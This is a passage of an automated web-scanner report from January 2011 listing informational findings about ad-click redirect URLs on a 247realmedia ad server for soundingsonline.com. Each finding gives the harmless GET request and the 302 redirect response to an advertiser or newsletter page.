20.210. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1417680846/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.211. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:24:40 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.212. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:50:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 355
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.213. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1441306759/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:46:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.214. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1442210960/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.215. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:36 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.216. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1447146839/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.217. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1455284800/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:28 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

20.218. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/146842624/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:29 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.219. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1474955992/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:56:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.220. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/14797078/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:43:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.221. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1481879578/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:06 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.222. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:42:06 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.223. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486459418/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:54:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

